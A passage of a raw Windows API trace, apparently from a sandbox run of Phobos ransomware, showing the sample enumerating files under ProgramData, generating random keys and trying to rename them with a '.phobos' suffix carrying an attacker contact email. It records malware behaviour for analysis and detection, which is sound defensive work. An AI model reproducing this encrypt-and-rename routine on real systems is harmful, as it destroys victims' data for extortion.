liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf940 | out: lpNewFilePointer=0x0) returned 1 [0121.397] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.397] CloseHandle (hObject=0x2b4) returned 1 [0121.397] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.397] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0121.397] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=14972) returned 1 [0121.397] CloseHandle (hObject=0x2b4) returned 1 [0121.397] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl")) returned 0x20 [0121.397] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.397] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0121.397] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf940 | out: lpNewFilePointer=0x0) returned 1 [0121.397] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf940 | out: lpNewFilePointer=0x0) returned 1 [0121.397] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.398] CloseHandle (hObject=0x2b4) returned 1 [0121.398] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.398] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.509] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=5430) returned 1 [0121.509] CloseHandle (hObject=0x2ac) returned 1 [0121.509] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico")) returned 0x2020 [0121.509] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.509] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.509] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.509] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0122.468] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=25214) returned 1 [0122.468] CloseHandle (hObject=0x32c) returned 1 [0122.468] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico")) returned 0x2020 [0122.468] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.469] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.469] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.469] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0122.471] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=25214) returned 1 [0122.471] CloseHandle (hObject=0x338) returned 1 [0122.471] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico")) returned 0x2020 [0122.471] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.471] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.472] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.472] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0122.473] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=14688) returned 1 [0122.473] CloseHandle (hObject=0x338) returned 1 [0122.473] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll")) returned 0x2020 [0122.473] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.473] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.495] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.495] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.499] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=48992) returned 1 [0122.499] CloseHandle (hObject=0x334) returned 1 [0122.499] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll")) returned 0x2020 [0122.499] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.499] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.500] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.500] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.500] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=252256) returned 1 [0122.501] CloseHandle (hObject=0x334) returned 1 [0122.501] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll")) returned 0x2020 [0122.501] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.501] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.501] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.501] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.502] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=302944) returned 1 [0122.502] CloseHandle (hObject=0x334) returned 1 [0122.502] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll")) returned 0x2020 [0122.502] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.502] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.502] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.502] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.503] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=49504) returned 1 [0122.503] CloseHandle (hObject=0x334) returned 1 [0122.503] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll")) returned 0x2020 [0122.503] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.503] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.503] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.503] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.504] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=96608) returned 1 [0122.504] CloseHandle (hObject=0x334) returned 1 [0122.504] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll")) returned 0x2020 [0122.504] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.504] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.505] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.505] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.505] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=2944352) returned 1 [0122.505] CloseHandle (hObject=0x334) returned 1 [0122.505] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll")) returned 0x2020 [0122.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0122.506] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll")) returned 0 [0122.506] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.506] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.506] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=45920) returned 1 [0122.507] CloseHandle (hObject=0x334) returned 1 [0122.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll")) returned 0x2020 [0122.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.507] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.507] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.507] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.508] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=31584) returned 1 [0122.508] CloseHandle (hObject=0x334) returned 1 [0122.508] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll")) returned 0x2020 [0122.508] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.509] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.509] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.509] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.510] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=260960) returned 1 [0122.510] CloseHandle (hObject=0x334) returned 1 [0122.510] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll")) returned 0x2020 [0122.510] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.510] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.510] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.510] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.511] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=226656) returned 1 [0122.511] CloseHandle (hObject=0x334) returned 1 [0122.511] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll")) returned 0x2020 [0122.511] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.511] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.512] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.512] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: 